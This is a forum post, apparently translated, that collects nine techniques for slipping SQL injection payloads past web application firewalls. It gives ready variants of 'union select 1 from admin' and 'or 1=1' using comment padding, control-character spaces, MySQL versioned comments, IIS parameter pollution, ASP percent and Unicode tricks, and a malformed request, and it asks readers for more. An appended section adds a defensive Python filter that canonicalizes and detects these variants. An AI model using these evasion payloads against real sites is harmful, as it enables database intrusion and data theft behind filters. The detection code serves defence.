Original address: http://bbs.10hst.com/viewthread.php?tid=39&extra=page%3D1
====== Test code for bypassing anti-injection systems, including WAFs ======
Solution 1: Replace the spaces in the test code with /**/ or + (note: /**/ and + must not be URL-encoded).
For example, id=1 or 1=1 becomes:
    id=1/**/or/**/1=1
    id=1+or+1=1
Solution 2: Replace the spaces with the invisible characters %09, %0A, %0D or %0B.
For example, id=1 or 1=1 becomes:
    id=1%09or%091=1
    id=1%0Aor%0A1=1
    id=1%0A%0Bor%0A%0B1=1
Solution 3: Wrap the keyword in /*! */. Note that this method only applies to sites backed by a MySQL database.
For example, id=1 and 1=1 becomes:
    id=1/*!and*/1=1
Solution 4: Use parameter pollution to bypass. Note that this method only applies when the web server is Microsoft IIS.
For example, id=1 union select 1 from admin becomes:
    id=1 union/*&id=*/select/*&id=*/from/*&id=*/admin
Solution 5: Use % to bypass. Note that this method only applies to asp/aspx.
For example, id=1 union select 1 from admin becomes:
    id=1 un%io%n sel%e%ct 1 fr%o%m ad%m%in
Solution 6: Use %23 (# in plaintext) in combination with %0A. Note that this method only applies to sites backed by a MySQL database.
For example, id=1 union select 1 from admin becomes:
    id=1%23afafasdf%0Aunion%23afafasdf%0Aselect%23afafasdf%0A1%23afafasdf%0Afrom%23afafasdf%0Aadmin
Solution 7: Use duplicated keywords to bypass.
For example, id=1 union select 1 from admin becomes:
    id=1 ununionion seleselectct 1 frofromm admin
Solution 8: Use Unicode encoding to bypass.
For example, id=1 union select 1 from admin becomes:
    id=1 %u0075%u006e%u0069%u006f%u006e select 1 %u0066%u0072%u006f%u006d admin
Solution 9: Use a malformed packet to bypass; this only applies to asp/aspx. For more information, see the 80sec site.
For example, id=1 union select 1 from admin is sent as:
    GET /test.asp HTTP/1.1
    Host: 172.16.15.50
    Content-Type: application/x-www-form-urlencoded
    Content-Length: 15

    T=3 */select /*
The above are the methods I have collected. Does anyone have a new one? Please add it.
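On the detection side, the variants in Solutions 1 to 8 all collapse to the same string once a filter canonicalizes the input before matching. The following is an added example, not part of the original post: a Python sketch in which RULE, canonicalize, inspect and the sample inputs are constructed for illustration, and the comma join for repeated parameters is the assumed IIS/ASP behaviour.

```python
import re
from collections import defaultdict

# Constructed demo rule; a production rule set would be broader.
RULE = re.compile(r"union.*select|select.*from|\b(?:or|and) \d+ ?= ?\d+")

def canonicalize(raw: str) -> str:
    """Undo the encodings from Solutions 1-8 on a raw, still-encoded value."""
    v = raw.replace("+", " ")  # '+' is a form-encoded space
    # %uXXXX and ordinary %XX escapes, decoded in a single pass
    v = re.sub(r"%u([0-9a-fA-F]{4})|%([0-9a-fA-F]{2})",
               lambda m: chr(int(m.group(1) or m.group(2), 16)), v)
    v = v.replace("%", "")  # Solution 5: a '%' left over after decoding is dropped
    v = re.sub(r"#[^\n]*(?:\n|$)", " ", v)  # MySQL '#' comment runs to end of line
    v = re.sub(r"/\*!\d*(.*?)\*/", r" \1 ", v, flags=re.S)  # MySQL executes /*! ... */
    v = re.sub(r"/\*.*?\*/", " ", v, flags=re.S)  # ordinary comment acts as a space
    return re.sub(r"\s+", " ", v).strip().lower()  # \s covers TAB, LF, VT, CR

def inspect(query: str) -> dict:
    """Return {param: canonical value} for every parameter that matches RULE."""
    merged = defaultdict(list)
    for pair in query.split("&"):
        name, _, value = pair.partition("=")
        merged[name.lower()].append(value)
    hits = {}
    for name, values in merged.items():
        # Assumption: repeated parameters are joined with a comma, so the
        # joined value is inspected, not each occurrence alone (Solution 4).
        canon = canonicalize(",".join(values))
        if RULE.search(canon):
            hits[name] = canon
    return hits

# Constructed sample inputs, taken from the examples in this post.
SAMPLES = [
    "id=1/**/or/**/1=1",
    "id=1%0A%0Bor%0A%0B1=1",
    "id=1 union/*&id=*/select/*&id=*/from/*&id=*/admin",
    "id=1 un%io%n sel%e%ct 1 fr%o%m ad%m%in",
    "id=42&page=3",
]

if __name__ == "__main__":
    for q in SAMPLES:
        print(q, "->", inspect(q))
```

RULE matches substrings without word boundaries around union and select, which is why the duplicated-keyword form from Solution 7 is still caught.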